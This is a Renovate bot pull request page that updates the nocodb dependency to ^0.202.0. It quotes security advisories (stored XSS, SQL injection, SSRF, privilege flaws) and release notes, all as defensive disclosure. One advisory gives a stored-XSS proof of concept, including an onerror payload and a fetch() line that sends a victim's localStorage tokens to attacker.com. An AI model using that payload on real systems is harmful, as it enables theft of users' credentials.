-
Notifications
You must be signed in to change notification settings - Fork 1
Update dependency nocodb to ^0.202.0 [SECURITY] #145
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
renovate
wants to merge
1
commit into
develop
Choose a base branch
from
renovate/npm-nocodb-vulnerability
base: develop
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
65fc1bd to
5137d3c
Compare
5137d3c to
bd68263
Compare
bd68263 to
6258c9a
Compare
6258c9a to
33d898b
Compare
33d898b to
8d94b38
Compare
24e0aca to
7f0ef8f
Compare
7f0ef8f to
7f67c27
Compare
7f67c27 to
bd39e39
Compare
bd39e39 to
a719f6f
Compare
a719f6f to
1c9c6ab
Compare
1c9c6ab to
6cce464
Compare
6cce464 to
fc27c83
Compare
Author
|
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
^0.83.0->^0.202.0GitHub Vulnerability Alerts
CVE-2022-2079
Cross-site Scripting (XSS) - Stored in GitHub repository nocodb/nocodb prior to 0.91.9.
CVE-2022-2063
Improper Privilege Management in GitHub repository nocodb/nocodb prior to 0.91.8.
CVE-2022-2064
Insufficient Session Expiration in GitHub repository nocodb/nocodb prior to 0.91.9.
CVE-2022-3423
NocoDB prior to 0.92.0 allows actors to insert large characters into the input field
New Projecton the create field, which can cause a Denial of Service (DoS) via a crafted HTTP request. Version 0.92.0 fixes this issue.CVE-2022-2062
In NocoDB prior to 0.91.7, the SMTP plugin doesn't have verification or validation. This allows attackers to make requests to internal servers and read the contents.
CVE-2023-5104
Improper Input Validation in GitHub repository nocodb/nocodb prior to 0.96.0.
CVE-2023-43794
Summary
Nocodb contains SQL injection vulnerability, that allows an authenticated attacker with creator access to query the underlying database.
Product
nocodb/nocodb
Tested Version
0.109.2
Details
SQL injection in
SqliteClient.ts(GHSL-2023-141)By supplying a specially crafted payload to the given below parameter and endpoint, an attacker can inject arbitrary SQL queries to be executed. Since this is a blind SQL injections, an attacker may need to use time-based payloads which would include a function to delay execution for a given number of seconds. The response time indicates, whether the result of the query execution was true or false. Depending on the result, the HTTP response will be returned after a given number of seconds, indicating TRUE, or immediately, indicating FALSE. In that way, an attacker can reveal the data present in the database.
The
triggerListmethod creates a SQL query using the user-controlledtable_nameparameter value from thetableCreateendpoint.Impact
This issue may lead to
Information Disclosure.Credit
This issue was discovered and reported by GHSL team member @sylwia-budzynska (Sylwia Budzynska).
Disclosure Policy
This report is subject to our coordinated disclosure policy.
CVE-2023-50718
Summary
An authenticated attacker with create access could conduct a SQL Injection attack on MySQL DB using unescaped table_name.
Details
SQL Injection vulnerability occurs in VitessClient.ts.
The variable ${args.tn} refers to the table name entered by the user.
A malicious attacker can escape the existing query by including a special character (') in the table name and insert and execute a new arbitrary SQL query.
Impact
This vulnerability may result in leakage of sensitive data in the database.
CVE-2023-49781
Summary
A stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality.
Details
The nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of "urls" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is <img src=1 onerror="malicious javascripts"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked.
PoC
Step 1: Attacker login the nocodb and creates a table with two fields, "T" and "F". The type of field "T" is "SingleLineText", and the type of the "F" is "Fomula" with the formula content {T}
Step 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX)
Step 3: The attacker clicks the "Share" button and enables public viewing, then copies the shared link and sends it to the victims
Step 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage
The attackers can use the fetch(http://attacker.com/?localStorage.getItem('nocodb-gui-v2')) to replace the alert and then steal the victims' credentials in their attacker.com website.
Impact
Stealing the credentials of NocoDB user that clicks the malicious link.
Release Notes
nocodb/nocodb (nocodb)
v0.202.10: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
What's Changed
🐛 Closed Issues
NocoDB Cloud Available#69700108002to0111002failed", Relation aready exists #6826Rollupsumfordurationfield,the data display should also beduration, but it shows the number of seconds. #6778New Contributors
Full Changelog: nocodb/nocodb@0.202.9...0.202.10
v0.202.9: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
🐛 Closed Issues
save changeson closing expanded record #7066Lookup > Child fieldneeds fix #6989IDnot ignored if sent in API payload #5871What's Changed
New Contributors
Full Changelog: nocodb/nocodb@0.202.8...0.202.9
v0.202.8: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
🐛 Closed Issues
What's Changed
New Contributors
Full Changelog: nocodb/nocodb@0.202.7...0.202.8
v0.202.7: : Hotfix ReleaseCompare Source
🚀 NocoDB : Hotfix Release
What's Changed
Full Changelog: nocodb/nocodb@0.202.6...0.202.7
v0.202.6: : Bug Fix ReleaseCompare Source
🚀 NocoDB : Bug Fix Release
🐛 Closed Issues
Linked recordsmodal from form view is stuck with skeleton loader #6844Team & Settingsnot accessible for Org Creator #6784Invalid Date#6683Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.